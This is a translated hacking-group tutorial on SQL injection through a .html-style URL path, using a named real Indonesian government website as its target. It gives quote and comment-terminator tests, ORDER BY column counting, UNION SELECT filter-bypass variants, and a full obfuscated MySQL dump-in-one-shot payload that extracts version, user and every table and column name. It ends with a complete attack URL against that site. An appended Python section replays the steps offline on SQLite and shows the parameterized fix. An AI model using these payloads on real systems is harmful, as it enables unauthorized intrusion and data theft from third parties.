
SQL Injection in an HTML Parameter


*SQL INJECTION (CHALLENGE) IN AN HTML PARAMETER*
*Assalamualaikum, back again with me, KICK_OUT. This time I'm sharing a tutorial for a challenge where the injectable parameter is carried in a .html-style URL path rather than in a ?id= query string, as in the target below.*

*For the challenge:*
*https://lampung.kemenag.go.id/*

*To find the id parameter, use Anon HackBar; if you don't have Anon HackBar you can download it via Google, there are plenty of versions :)*


*Paste the target website into Anon HackBar.*


*Slide the third control from the top all the way to the end and press Extract Links.*

*Choose Page Links.*

*Pick one of the pages it lists.*

*Once you have one, paste it into the browser, or inject directly from Anon HackBar if you prefer, whichever suits you :)*


*To test whether the site is vulnerable, append a single quote (') to the parameter value; a quote that breaks the query is the first sign the site is open to SQL injection :)*


*If it is vulnerable, the page changes in some way: images or text go missing or the layout breaks, because the SQL query no longer parses.*

*Then add a balance (a comment terminator) after the parameter, i.e. right after that quote :)*

*The page returns to normal, because the terminator comments out the remainder of the original query and the injected quote is no longer left unmatched.*

*There are several kinds of balance, for example:*
*1. --+-*
*2. -- -*
*3. --+*
*4. +--+*
*5. %23*
*6. ;%00*
*(and many more; in a URL, + decodes to a space, %23 is the # comment marker and %00 is a NUL byte. MySQL's -- comment needs a space after it, which is why --+- and -- - are used rather than a bare --)*

*When that works, ORDER BY increasing numbers until the page errors again, for example:*
*ORDER BY 1--+-*
*ORDER BY 2--+-*
*ORDER BY 3--+-*
*There are also ORDER BY bypasses, for example:*
*ORDER+BY+1+ASC--+-*

*Here the site errored at 17, which means the query returns only 16 columns :)*

*To find the reflected column number (the "angka togel", i.e. the column whose value actually shows up in the page), do a UNION SELECT carrying exactly as many numbered columns as ORDER BY gave you (here 16):*
*UNION SELECT 1,2,...,16--+-*
*The UNION must have the same column count as the original query; any other count errors.*
*There are also UNION SELECT bypasses, for example:*
1.+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3 (continue up to the column count) --+-
2.+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+
*(and many more :)*

*OK, on to the reflected number, using: Parameter' Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html*
*If the page still shows no number, put a ( - ) or ( . ) in front of the id value so the original row matches nothing and the UNION row is what gets rendered. Some sites need ( %25 0 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html ) instead.*

*And boom, the reflected number shows up :)*

*Now we inject by putting the DIOS in place of that reflected column number*
*in Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html*

*And boom, solved :)*


The DIOS (dump-in-one-shot) I used. The /*!50000 ... */ wrappers are MySQL version-conditional comments used to slip past keyword filters; the hex literals are just HTML and labels (0x3c62723e is <br>, 0x56455253494f4e3a3a20 is "VERSION:: ", 0x555345523a3a20 is "USER:: ", 0x44415441424153453a3a20 is "DATABASE:: ", and the longer ones are <font color="red">/<font color="green"> tags); and the @x subquery walks information_schema.columns for the current database, appending table_name :: column_name for every column:

/*!50000cOncat/**KICK_OUT**/*/(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,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,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x))


*And the result:*

https://lampung.kemenag.go.id/static--43310'%20UNION%20SELECT%201,/*!50000cOncat/**KICK_OUT**/*/(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,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,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x)),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html
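The whole walkthrough above, replayed offline against a constructed SQLite database so the mechanics (quote breaks the query, balance repairs it, ORDER BY counts columns, UNION SELECT finds the reflected columns, DIOS reads metadata through them) can be checked without touching anyone's site. This is an added example, not code from the original post or from the tools it names: the posts/users schema, the id value 43310 and the page template are assumptions, and SQLite's sqlite_version() and sqlite_master stand in for MySQL's version() and information_schema. The vulnerable query is shown beside the parameterized fix.

```python
import re
import sqlite3

# Constructed sample schema and rows; not the target's real schema.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE posts(id INTEGER, title TEXT, body TEXT, author TEXT);
        CREATE TABLE users(uid INTEGER, username TEXT, pwhash TEXT);
        INSERT INTO posts VALUES (43310, 'Welcome', 'First post', 'admin');
        INSERT INTO posts VALUES (43311, 'News',    'Second post', 'editor');
    """)
    return con

def vulnerable_page(con, raw_id):
    """The bug the walkthrough relies on: the id from the URL is pasted
    straight into the SQL string. Returns the rendered HTML, or None when
    the query errors (the 'page looks broken' signal)."""
    sql = f"SELECT id, title, body, author FROM posts WHERE id = '{raw_id}'"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    # Only title and body reach the HTML, so only columns 2 and 3 are reflected.
    return "".join(f"<b>{r[1]}</b><p>{r[2]}</p>" for r in rows)

def safe_page(con, raw_id):
    """The fix: a bound parameter. Input can never change the query's shape."""
    rows = con.execute(
        "SELECT id, title, body, author FROM posts WHERE id = ?", (raw_id,)
    ).fetchall()
    return "".join(f"<b>{r[1]}</b><p>{r[2]}</p>" for r in rows)

def is_injectable(con, base_id):
    """Steps 1-2: a lone quote breaks the page; quote plus a comment
    terminator ('balance', here '-- -') restores it. Both must hold."""
    broken = vulnerable_page(con, f"{base_id}'") is None
    repaired = vulnerable_page(con, f"{base_id}'-- -") == vulnerable_page(con, base_id)
    return broken and repaired

def count_columns(con, base_id, limit=32):
    """Step 3: ORDER BY n renders while n <= column count and errors at n+1,
    so the last n that renders is the column count."""
    for n in range(1, limit + 1):
        if vulnerable_page(con, f"{base_id}' ORDER BY {n}-- -") is None:
            return n - 1
    return None

def reflected_positions(con, ncols):
    """Step 4: negate the id so the real row vanishes, UNION SELECT 1..n,
    and read back which marker numbers the template actually prints."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = vulnerable_page(con, f"-1' UNION SELECT {markers}-- -")
    text = re.sub(r"<[^>]*>", " ", html or "")   # drop tags so '<b>' digits don't count
    return sorted({int(m) for m in re.findall(r"\d+", text)})

def dump_in_one_shot(con, ncols, pos):
    """Step 5: replace the reflected marker with an expression that pulls
    metadata. SQLite analogue of the page's MySQL DIOS: the engine version
    plus every table name from sqlite_master, joined with <br> exactly as
    the 0x3c62723e literals do in the original payload."""
    payload = ("sqlite_version() || '<br>' || "
               "(SELECT group_concat(name, '<br>') FROM sqlite_master WHERE type='table')")
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = payload
    return vulnerable_page(con, f"-1' UNION SELECT {','.join(cols)}-- -")

if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db, "43310"))
    n = count_columns(db, "43310")
    print("columns:", n)
    pos = reflected_positions(db, n)
    print("reflected positions:", pos)
    print(dump_in_one_shot(db, n, pos[0]))
    print("same payload against the fixed query:", repr(safe_page(db, "-1' UNION SELECT 1,2,3,4-- -")))
```

Run it and the UNION row surfaces the version and table list through column 2, while the same payload bound as a parameter in safe_page returns an empty page: the injection only works because the id is spliced into the SQL text.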

BomberCyberArmy
Me, F4K3_5M1LE